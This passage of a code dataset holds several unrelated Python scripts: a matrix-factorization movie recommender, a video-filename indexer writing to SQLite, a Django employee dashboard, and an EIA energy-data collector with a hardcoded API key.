5090]\n#loc函数:通过行索引 \"Index\" 中的具体值来取行数据(如取\"Index\"为\"A\"的行)\n#concat 按照索引拼接数据 此时是行拼接\ntop =pd.concat([movies.loc[top_movies.index.values],average_movie_rating.loc[top_movies.index.values].rating], axis=1)\n\n#评分差异比较大的电影 **乘方\ncontroversial_movies = data.groupby('movieId').apply(lambda x:len(x)**0.25 * x.std()).sort_values('rating', ascending=False).head(10)\npd.concat([movies.loc[controversial_movies.index.values], average_movie_rating.loc[controversial_movies.index.values].rating], axis=1)\n\n#数据转矩阵\nratings = data[['userId', 'movieId', 'rating']].values\n\n# Shuffle training examples so that movies and users are evenly distributed\nnp.random.shuffle(ratings)\n#参数 axisaxis=0 对每一列进行操作,axis=1 对每一行进行操作,userId从0开始int连续值,movieId从0开始int连续值\nx, y, _ = ratings.max(axis=0)\nn_users=int(x)\nn_items=int(y)\nprint(n_users, n_items)\n#数据集划分\nsplit_ratios = [0, 0.7, 0.85, 1]\nn = len(ratings)#返回矩阵行数\ntrain_ratings, valid_ratings, test_ratings = [ratings[int(n*lo):int(n*up)] for (lo, up) in zip(split_ratios[:-1], split_ratios[1:])]\ndef sample_random_training_index():\n return np.random.randint(0, len(train_ratings))\nx=sample_random_training_index()\nuser, item, rating = train_ratings[x]\nd=train_ratings[:,2]#取训练矩阵第三列的数据出来\nprint(\"test for data\")\nprint(x,user, item, rating )\nprint(len(d),d)\n\"\"\"\n>>>a = [1,2,3]\n>>> b = [4,5,6]\n>>> c = [4,5,6,7,8]\n>>> zipped = zip(a,b) # 打包为元组的列表\n[(1, 4), (2, 5), (3, 6)]\n>>> zip(a,c) # 元素个数与最短的列表一致\n[(1, 4), (2, 5), (3, 6)]\n[0,0.7,0.85]\n[0.7,0.85,1]\n[(0,0.7),(0.7,0.85),(0.85,1)]\n\"\"\"\ngradients = [\"dL_db\", \"dL_dbu\", \"dL_dbv\", \"dL_dU\", \"dL_dV\"]\n\n\nclass Model(object):\n def __init__(self, latent_factors_size, L2_bias=0, L2_emb=0):\n self.model_parameters = []\n self.gradients = []\n for (name, value) in self.initialize_parameters(latent_factors_size):\n setattr(self, name, value)\n self.gradients.append(\"dL_d%s\" % name)\n self.model_parameters.append(name)\n #gradients初始化的结果为[dL_db,dL_du,dL_dv,dL_dU,dL_dV]\n #model_parameters的初始化的结果为[ b,u,v,U ,V ]\n\n # Used to save parameters during the optimization\n def save_parameters(self):\n return [(name, np.copy(getattr(self, name))) for name in self.model_parameters]\n\n # Used to reload the best parameters once the optimization is finished\n def load_parameters(self, parameters):\n for (name, value) in parameters:\n setattr(self, name, value)\n \"\"\"\n 1 >>> class test():\n 2 ... name=\"xiaohua\"\n 3 ... def run(self):\n 4 ... return \"HelloWord\"\n 5 ...\n 6 >>> t=test()\n 7 >>> getattr(t, \"name\") #获取name属性,存在就打印出来。\n 8 'xiaohua'\n\n 1 >>> class test():\n 2 ... name=\"xiaohua\"\n 3 ... def run(self):\n 4 ... 
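The docstring above walks through how `zip` pairs each split boundary with the next one; the resulting three-way split, runnable on a toy array (sizes illustrative):

```python
import numpy as np

ratings = np.arange(20)          # stand-in for the shuffled ratings
split_ratios = [0, 0.7, 0.85, 1]
n = len(ratings)

train, valid, test = [
    ratings[int(n * lo):int(n * up)]
    for lo, up in zip(split_ratios[:-1], split_ratios[1:])
]
print(len(train), len(valid), len(test))  # 14 3 3
```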
return \"HelloWord\"\n 5 ...\n 6 >>> t=test()\n 7 >>> hasattr(t, \"age\") #判断属性是否存在\n 8 False\n 9 >>> setattr(t, \"age\", \"18\") #为属相赋值,并没有返回值\n 10 >>> hasattr(t, \"age\") #属性存在了\n 11 True\n \"\"\"\n # Random embedding generation from normal distribution, given a size and variance\n # 构造初始矩阵,用户矩阵U(n_users + 1)*100 物品矩阵V (n_items + 1)*100\n # 用户偏好矩阵 u 物品偏差v\n def initialize_parameters(self, latent_factors_size=100, std=0.05):\n U = np.random.normal(0., std, size=(n_users + 1, latent_factors_size))\n V = np.random.normal(0., std, size=(n_items + 1, latent_factors_size))\n u = np.zeros(n_users + 1)\n v = np.zeros(n_items + 1)\n return zip((\"b\", \"u\", \"v\", \"U\", \"V\"), (0, u, v, U, V))\n\n # Compute the gradients of the biases and embeddings, given the user-item\n def compute_gradient(self, user_ids, item_ids, ratings):\n res={}\n user_ids = user_ids\n item_ids = item_ids\n predicted_ratings = self.predict(user_ids, item_ids)\n residual = ratings - predicted_ratings\n\n # biases\n dL_db = -2 * residual\n res[\"dL_db\"]=dL_db\n dL_dbu = -2 * residual\n dL_dbv = -2 * residual\n\n # embeddings\n eu = self.U[user_ids]\n ev = self.V[item_ids]\n\n dL_dU = -2 * residual * ev\n dL_dV = -2 * residual * eu\n\n # Regularization\n l2 = 0.1\n dl2eu_dU = l2 * 2 * eu\n dl2ev_dV = l2 * 2 * ev\n dl2bu_dbu = l2 * 2 * self.u[user_ids]\n dl2bv_dbv = l2 * 2 * self.v[item_ids]\n\n dL_dbu = dL_dbu + dl2bu_dbu\n res[\"dL_dbu\"] = dL_dbu\n dL_dbv = dL_dbv + dl2bv_dbv\n res[\"dL_dbv\"] = dL_dbv\n dL_dU = dL_dU + dl2eu_dU\n res[\"dL_dU\"] = dL_dU\n dL_dV = dL_dV + dl2ev_dV\n res[\"dL_dV\"] = dL_dV\n return res\n\n # Sum of the biases and dot product of the embeddings\n #广播的时候要用 axis=-1\n def predict(self, user_ids, item_ids):\n user_ids = user_ids.astype('int')\n item_ids = item_ids.astype('int')\n return sum([self.b,\n self.u[user_ids],\n self.v[item_ids],\n (self.U[user_ids]*self.V[item_ids]).sum(axis=-1)])#向量求和 axis=-1:在最后一维操作\n #在user_ids为多个数据时 U[user_ids]会变成3维,\n \"\"\"\n1 c = np.array([[0, 2, 1], [3, 5, 6], [0, 1, 1]])\n2 print c.sum()\n3 print c.sum(axis=0)\n4 print c.sum(axis=1)\n5 结果分别是:19, [3 8 8], [ 3 14 2]\n6 axis=0, 表示列。\n7 axis=1, 表示行。\n \"\"\"\n\n # Perform a gradient descent step\n def update_parameters(self, user, item, rating, learning_rate=0.005):\n user = user.astype('int')\n item = item.astype('int')\n gradients = self.compute_gradient(user, item, rating)\n self.b = self.b - learning_rate * gradients['dL_db']\n self.u[user] = self.u[user] - learning_rate * gradients['dL_dbu']\n self.v[item] = self.v[item] - learning_rate * gradients['dL_dbv']\n self.U[user] = self.U[user] - learning_rate * gradients['dL_dU']\n self.V[item] = self.V[item] - learning_rate * gradients['dL_dV']\n# Generate a random number\nmodel = Model(latent_factors_size=100)\nmodel.b = train_ratings[:, 2].mean()\n\nsgd_iteration_count = 0\nbest_validation_rmse = 9999\npatience = 0\nupdate_frequency = 10000\n#每次依次增加10000个数据进行训练,(有放回随机抽取)\ntrain_errors = []\nvalid_errors = []\ntest_errors = []\n\nbest_parameters = None\n\n# model size = 100\n# learning rate = 0.005\n# l2 = 0.1\n# Should take 6 minutes\ndef sample_random_training_index():\n return np.random.randint(0, len(train_ratings))\n\n# Compute root mean squared error between x and y\ndef compute_rmse(x, y):\n return ((x - y)**2).mean()**0.5\n\n# utilitary functions for getting the train/valid/test\ndef get_rmse(ratings):\n return compute_rmse(model.predict(ratings.T[0:1],ratings.T[1:2]), ratings.T[2])\n #*ratings.T[:2] 传入参数出入两列,一列为userId 第二列为 movieId 
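The model's prediction rule is a global bias plus a user bias, an item bias, and an embedding dot product. A toy NumPy restatement of just that rule (shapes and the seed are illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)
n_users, n_items, k = 4, 5, 3
b = 3.5                                   # global bias
bu = np.zeros(n_users)                    # per-user bias
bv = np.zeros(n_items)                    # per-item bias
U = rng.normal(0.0, 0.05, (n_users, k))   # user embeddings
V = rng.normal(0.0, 0.05, (n_items, k))   # item embeddings


def predict(user, item):
    return b + bu[user] + bv[item] + U[user] @ V[item]


print(predict(2, 4))  # close to the global bias before any training
```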
函数的广播机制标量和矩阵参数传入的区别测试中有案例\n #是利用训练数据进行训练(训练的时候一条一条数据对模型进行逐步优化,梯度下降),评估的时候利用所有训练集进行评估\n\ndef get_trainset_rmse():\n return get_rmse(train_ratings)\n\ndef get_validset_rmse():\n return get_rmse(valid_ratings)\n\ndef get_testset_rmse():\n return get_rmse(test_ratings)\n\n\nstart_time = time.time()\nbest_validation_rmse=1\nwhile True:\n try:\n if sgd_iteration_count % update_frequency == 0 and sgd_iteration_count>0:\n train_set_rmse = get_trainset_rmse()\n valid_set_rmse = get_validset_rmse()\n test_set_rmse = get_testset_rmse()\n\n train_errors.append(train_set_rmse)\n valid_errors.append(valid_set_rmse)\n test_errors.append(test_set_rmse)\n\n print( 'Iteration: ', sgd_iteration_count)\n print( 'Validation RMSE:', valid_set_rmse)\n if valid_set_rmse < best_validation_rmse:\n print( 'Test RMSE :', test_set_rmse)\n print('Best validation error up to now !')\n patience = 0\n best_validation_rmse = valid_set_rmse\n best_parameters = model.save_parameters()\n else:\n patience += 1\n if patience >= 20:\n print\n 'Exceed patience for optimization, stopping!'\n break\n print\n training_idx = sample_random_training_index()\n user, item, rating = train_ratings[training_idx]\n print('initial user and item sgd_iteration_count',user.shape, item.shape,sgd_iteration_count)\n model.update_parameters(user, item, rating)\n sgd_iteration_count += 1\n except KeyboardInterrupt:\n print( 'Stopped Optimization')\n print('Current valid set performance=%s' % compute_rmse(model.predict(*valid_ratings.T[:2]), valid_ratings[:, 2]))\n print('Current test set performance=%s' % compute_rmse(model.predict(*test_ratings.T[:2]), test_ratings[:, 2]))\n break\n\nmodel.load_parameters(best_parameters)\nstop_time = time.time()\n\nprint('Optimization time : ', (stop_time - start_time) / 60., 'minutes')\n\nx = update_frequency * np.arange(len(train_errors))\nfig = plt.figure(num=None, figsize=(10, 10), dpi=500)\nplt.plot(x, train_errors, 'r--', x, valid_errors, 'bs', x, test_errors, 'g^')\nplt.legend(['training error', 'validation error', 'testing error'])\nplt.show()\nprint(\"start test\")\ntest_predictions = model.predict(*test_ratings.T[:2])\ntest_df = pd.DataFrame({'userId': test_ratings[:, 0],\n 'movieId': test_ratings[:, 1],\n 'rating': test_ratings[:, 2],\n 'prediction': test_predictions})\ntest_df.head()\n#在测试集上的表现\nprint ('Root Mean Squared Error\\t\\t', ((test_df.rating - test_df.prediction)**2).mean()**0.5)\nprint ('Mean Absolute Error\\t\\t', (test_df.rating - test_df.prediction).abs().mean())\nprint ('Mean Absolute Percentile Error\\t', 100*((test_df.rating - test_df.prediction).abs() / test_df.rating).mean(), '%')\n\nplt.plot(*test_df.groupby('rating').prediction.mean().reset_index().values.T)\nplt.plot(np.arange(0, 6), np.arange(0, 6), '--')\nplt.xlim([0.5, 5])#x轴刻度\nplt.ylim([0.5, 5])#y轴刻度\nplt.xlabel('True Rating')#x轴的含义\nplt.ylabel('Mean Predicted Rating')\n# the model is a bit more conservative, this is normal\n\n#相似度计算\nmovies_embeddings = dict([(i, model.V[i]) for i in movies.index.values])\n#余弦相似度计算\ndef compute_cosine_similarity(movieId):\n movie_embedding = movies_embeddings[movieId]\n movie_embedding_norm = (movie_embedding**2).sum()**0.5\n similarity = dict([(movie, ((movie_embedding*emb).sum()) / (((emb**2).sum()**0.5) * movie_embedding_norm))\n for (movie, emb) in movies_embeddings.items()])\n return similarity\n#欧式距离相似度\ndef compute_euclidian_similarity(movieId):\n movie_embedding = movies_embeddings[movieId]\n similarity = dict([(movie, -((movie_embedding-emb)**2).sum()**0.5)\n for (movie, emb) in 
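For reference, the three evaluation numbers printed above (RMSE, MAE, MAPE) computed on a toy pair of arrays:

```python
import numpy as np

rating = np.array([4.0, 3.0, 5.0])
prediction = np.array([3.5, 3.5, 4.0])

rmse = np.sqrt(((rating - prediction) ** 2).mean())
mae = np.abs(rating - prediction).mean()
mape = 100 * (np.abs(rating - prediction) / rating).mean()
print(rmse, mae, mape)  # ~0.707 0.667 16.39
```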
movies_embeddings.items()])\n return similarity\n\nmovies[movies.title.str.startswith('Catch Me')]\n# movieId = 5952 # lord of the rings\nmovieId = 79132 # inception\n# movieId = 1 # toy story\n\nsorted_movies = sorted(compute_cosine_similarity(movieId).items(), key = lambda x:x[1])\n# sorted_movies = sorted(compute_euclidian_similarity(movieId).items(), key = lambda x:x[1])\n\nprint ('Closest')\nfor i in range(1, 16):\n id, sim = sorted_movies[-i]\n print (i, movies.loc[id].title, '\\t', movies.loc[id].genres, sim)\n print\n\nprint ('Farthest')\nfor i in range(15,-1,-1):\n id, sim = sorted_movies[i]\n print( i, movies.loc[id].title)\n print( '\\t', movies.loc[id].genres, sim)\n print", "sub_path": "MatrixCf/MF.py", "file_name": "MF.py", "file_ext": "py", "file_size_in_byte": 15904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 10, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
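`compute_cosine_similarity` above does one Python-level dot product per movie. Stacking the embeddings once allows the whole ranking in a single matrix-vector product (a sketch reusing the script's `movies_embeddings` dict; the stacking step is an assumption about its layout):

```python
import numpy as np

movie_ids = list(movies_embeddings.keys())
emb_matrix = np.stack([movies_embeddings[m] for m in movie_ids])
emb_norms = np.linalg.norm(emb_matrix, axis=1)


def cosine_similarities(movie_id):
    q = movies_embeddings[movie_id]
    sims = emb_matrix @ q / (emb_norms * np.linalg.norm(q))
    return dict(zip(movie_ids, sims))
```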
"line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 181, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 274, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 296, "usage_type": "call"}, {"api_name": "time.time", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 357, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 357, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}]} +{"seq_id": "601926029", "text": "from pathlib import Path\nimport os\nimport sqlite3\nimport 
re\n\ntree_str = ''\np = Path('Z:\\AVs')\n\nfileList = []\n\nclass MySqlite3:\n def __init__(self):\n self.dbFile = r'./jav.db'\n self.tableName = 'jav_file'\n\n self.dbConnect()\n\n self.cur.execute('''DROP TABLE IF EXISTS jav_file_t''')\n self.cur.execute('''CREATE TABLE IF NOT EXISTS jav_file_t(\n file_name VARCHAR(256) NOT NULL,\n film_index VARCHAR(256) NOT NULL,\n file_sub_index VARCHAR(256)\n )''')\n\n## connect to the database,create connect object and cursor object\n def dbConnect(self):\n self.conn = sqlite3.connect(self.dbFile)\n self.cur = self.conn.cursor()\n## disconnect\n def closeCnx(self):\n self.conn.close()\n\n def insertData(self, fileName, filmIndex, fileSubIndex):\n self.cur.execute(\"INSERT INTO jav_file_t VALUES (?, ?, ?)\", (fileName, filmIndex, fileSubIndex))\n self.conn.commit()\n\n def __del__(self):\n self.closeCnx()\n\ndef generate_tree(pathname, n=0):\n global tree_str\n if pathname.is_file():\n fileList.append(pathname)\n elif pathname.is_dir():\n for cp in pathname.iterdir():\n generate_tree(cp, n + 1)\n\nclass JavProcessor:\n def __init__(self):\n self.txtContent = []\n self.fileIndexList = []\n\n def inputFromFile(self, sourceFile):\n returnVal = []\n try:\n fileHandler = open(sourceFile, 'r',encoding='utf-8')\n except:\n print(\"Can NOT open file %s, please check!\", sourceFile)\n return -1\n while 1:\n line = fileHandler.readline()\n if not line:\n fileHandler.close()\n break\n returnVal.append(line)\n self.getJavIndex(line)\n self.txtContent = returnVal\n return 1\n\n def getJavIndex(self, fullPathFileName):\n fileName = re.search(\"([^<>/\\\\\\|:\"\"\\*\\?]+\\.\\w+$)\",fullPathFileName).group()\n if re.search(\"\\.(mp4|rmvb|flv|mpeg|avi|mov|wmv|rmvb)$\",fileName):\n #matchGrp = re.match(\".*[\\\\\\| |\\-|\\)|\\(|\\[|\\.]([\\w|-]{2,6})[-|_]?(\\d{2,})\", fileName)\n matchGrp = re.match(\"[ |\\-|\\)|\\(|\\[|\\.|\\]]*([\\w]{2,8})[-|_]((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\".*[ ]([a-z|A-Z]{2,6})-((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\"[^|.*[^a-z|^A-Z|^0-9|]]*([a-z|A-Z]{2,6})-((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\".*[^a-z|^A-Z|^0-9]*([a-z|A-Z]{2,6})((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\".*[^a-z|^A-Z|^0-9]([a-z|A-Z]{2,6})-((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n print(\"Error File Name: %s\",fileName)\n return\n print(\"5\")\n\n try:\n filmIndex = matchGrp.group(1)+\"-\"+matchGrp.group(3)\n fileIndex = matchGrp.group(1)+\"-\"+matchGrp.group(2)\n except:\n print(\"Error Can not Join \", matchGrp.group(1), matchGrp.group(3),fileName)\n return\n\n self.fileIndexList.append([fullPathFileName, filmIndex, fileIndex])\n\n def outputList(self):\n return self.fileIndexList\n\n def outputList2File(self):\n fileHandler = open(\"output.txt\",\"w\",encoding='utf-8')\n for item in self.fileIndexList:\n # print(item[0],\",\",item[1])\n #for fileLine in fileList:\n fileHandler.write(item[0][:-1]+\",\"+item[1]+\"\\n\")\n fileHandler.close\n\n def outputListIndex(self):\n fileHandler = open(\"output.txt\",\"w\",encoding='utf-8')\n for item in self.fileIndexList:\n # print(item[0],\",\",item[1])\n #for fileLine in fileList:\n fileHandler.write(item[0][:-1]+\",\"+item[1]+\"\\n\")\n fileHandler.close\n\n\n\nif __name__ == '__main__':\n #generate_tree(p)\n\n #fileHandler = open(\"output.txt\",\"w\",encoding='utf-8')\n #for fileLine in fileList:\n # fileHandler.write(str(fileLine)+\"\\n\")\n 
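`getJavIndex` above tries five near-identical patterns in sequence. Much of that cascade can be collapsed into one compiled pattern with named groups; a sketch (an approximation, not a drop-in replacement for every corner case the fallbacks handle):

```python
import re

INDEX_RE = re.compile(
    r"(?P<label>[A-Za-z]{2,8})[-_ ]?(?P<num>\d{2,})(?P<part>[a-eA-E])?"
)


def extract_index(file_name):
    m = INDEX_RE.search(file_name)
    if m is None:
        return None
    film_index = "%s-%s" % (m.group("label"), m.group("num"))
    file_index = film_index + (m.group("part") or "")
    return film_index, file_index


print(extract_index("[ABC] XYZ-123a.mp4"))  # ('XYZ-123', 'XYZ-123a')
```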
#fileHandler.close\n dbHandler = MySqlite3()\n jap = JavProcessor()\n jap.inputFromFile(\"JavFileList.txt\")\n javFileList = jap.outputList()\n jap.outputList2File()\n for item in javFileList:\n dbHandler.insertData(item[0],item[1],item[2])\n\n\n", "sub_path": "jav_file.py", "file_name": "jav_file.py", "file_ext": "py", "file_size_in_byte": 4558, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 27, "usage_type": "call"}, {"api_name": "re.search", "line_number": 71, "usage_type": "call"}, {"api_name": "re.search", "line_number": 72, "usage_type": "call"}, {"api_name": "re.match", "line_number": 74, "usage_type": "call"}, {"api_name": "re.match", "line_number": 76, "usage_type": "call"}, {"api_name": "re.match", "line_number": 78, "usage_type": "call"}, {"api_name": "re.match", "line_number": 80, "usage_type": "call"}, {"api_name": "re.match", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "241461317", "text": "# -*- coding: utf-8 -*-\nfrom collections import OrderedDict\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import ListView\nfrom django.http import HttpResponseRedirect\nfrom employees.models import Employee, RACE_GROUPS\n\n\nclass DashboardView(ListView):\n \"\"\"\n As the name suggests , this view is responsible\n for rendering the apps dashboard.\n\n NOTE: I noticed when querying the API limiting doesn't\n work as expected so this logic assumes only one page of\n results is returned.\n \"\"\"\n\n template_name = 'dashboard.html'\n token = None\n user_name = None\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"\n The dispatch method is responsible for checking\n if the user is authenticated and setting up\n initial values.\n \"\"\"\n if 'token' not in request.session:\n return HttpResponseRedirect('/login/')\n self.token = request.session['token']\n self.user_name = request.session['user_name']\n return super(DashboardView, self).dispatch(request, *args, **kwargs)\n\n def get_queryset(self):\n \"\"\"\n This is being set to a blank list since we're not using django's\n default ORM models and therefore need to define a custom method\n to set context data.\n \"\"\"\n return []\n\n def get_context_data(self, **kwargs):\n \"\"\"\n Query the rest API and find the relevant stats we need\n to populate the dashboard.\n \"\"\"\n context = super(DashboardView, self).get_context_data(**kwargs)\n EmployeeAPI = Employee(token=self.token)\n\n context['user_name'] = self.user_name\n context['birthdays'] = EmployeeAPI.objects.filter(\n ordering=\"-birth_date\"\n )\n\n # position__sort doesn't seem to work too well\n context['positions'] = EmployeeAPI.objects.filter(ordering=\"-position\")\n\n # all employees\n # Generator will discard values after iterating through them so\n # listify this to preserve data for later usuage.\n context['employees'] = list(EmployeeAPI.objects.filter(\n ordering=\"-user__first_name\"\n )\n )\n\n # calculate race groups\n race_groups = {}\n for emp in context['employees']:\n race = RACE_GROUPS[emp.race]\n if race in race_groups.keys():\n race_groups[race] += 1\n else:\n race_groups[race] = 1\n\n # sort by lowest to highest\n context['race_groups'] = OrderedDict(\n sorted(race_groups.items(), key=lambda k: k[1])\n )\n\n # calculate genders\n genders = {'Male': 0, 'Female': 0}\n\n for emp in context['employees']:\n gender = 'Male' if emp.gender == 'M' 
else 'Female'\n genders[gender] += 1\n\n # sort by lowest to highest\n context['genders'] = OrderedDict(\n sorted(genders.items(), key=lambda k: k[1])\n )\n return context\n", "sub_path": "employees/views/dashboard.py", "file_name": "dashboard.py", "file_ext": "py", "file_size_in_byte": 2992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.generic.ListView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 30, "usage_type": "call"}, {"api_name": "employees.models.Employee", "line_number": 49, "usage_type": "call"}, {"api_name": "employees.models.RACE_GROUPS", "line_number": 70, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "175986250", "text": "# Import needed modules\nimport csv\nimport math\nimport requests\n\n# Question: Compare the production of 3 different energy sources (renewable, nuclear, natrual gas) in kJs, by month, over the last 20 years\n\n# Define global EIA API key variable\nEIA_APIkey = \"a0758428314605c2172e496804668b98\"\n \n# Collect renewable data\ndef collectdata_renewable():\n \n # Define api basics\n # Note: url, with various ids and series, found on eia site\n url_renewable = \"http://api.eia.gov/series/?api_key=YOUR_API_KEY_HERE&series_id=TOTAL.REPRBUS.M\"\n \n # Insert EIA API key into url\n url_renewable = url_renewable.replace(\"YOUR_API_KEY_HERE\", EIA_APIkey)\n \n # Send data requests and store in a variable\n json_renewable = requests.get(url_renewable)\n \n # Convert from json into python\n renewable_0 = json_renewable.json()\n \n # Convert data into kJ from trillions of butanes (1055055852620 kJ per trillion butane)\n renewable_data = renewable_0['series'][0]['data']\n for a in renewable_data:\n a[1] = a[1]*1055055852620\n \n # Return data\n return renewable_data\n\n# Collect nuclear data\ndef collectdata_nuclear():\n \n # Define api basics\n # Note: url, with various ids and series, found on eia site.\n url_nuclear = \"http://api.eia.gov/series/?api_key=YOUR_API_KEY_HERE&series_id=TOTAL.NUETPUS.M\"\n \n # Insert EIA API key into url\n url_nuclear = url_nuclear.replace(\"YOUR_API_KEY_HERE\", EIA_APIkey)\n \n # Send data requests and store in a variable\n json_nuclear = requests.get(url_nuclear)\n \n # Convert from json into python\n nuclear_0 = json_nuclear.json()\n \n # Convert data from millions of kilowatt-hours into kJ (3600000000kJ per million of kilowatt-hours)\n nuclear_data = nuclear_0['series'][0]['data']\n for a in nuclear_data:\n a[1] = a[1]*3600000000\n \n # Return data\n return nuclear_data\n\n# Collect natural gas data\ndef collectdata_naturalgas():\n \n # Define api basics\n # Note: url, with various ids and series, found on eia site\n url_naturalgas = \"http://api.eia.gov/series/?api_key=YOUR_API_KEY_HERE&series_id=TOTAL.NGELPUS.M\"\n \n # Insert EIA API key into url\n url_naturalgas = url_naturalgas.replace(\"YOUR_API_KEY_HERE\", EIA_APIkey)\n \n # Send data requests and store in a variable\n json_naturalgas = requests.get(url_naturalgas)\n \n # Convert from json into python\n naturalgas_0 = json_naturalgas.json()\n \n # Convert data from 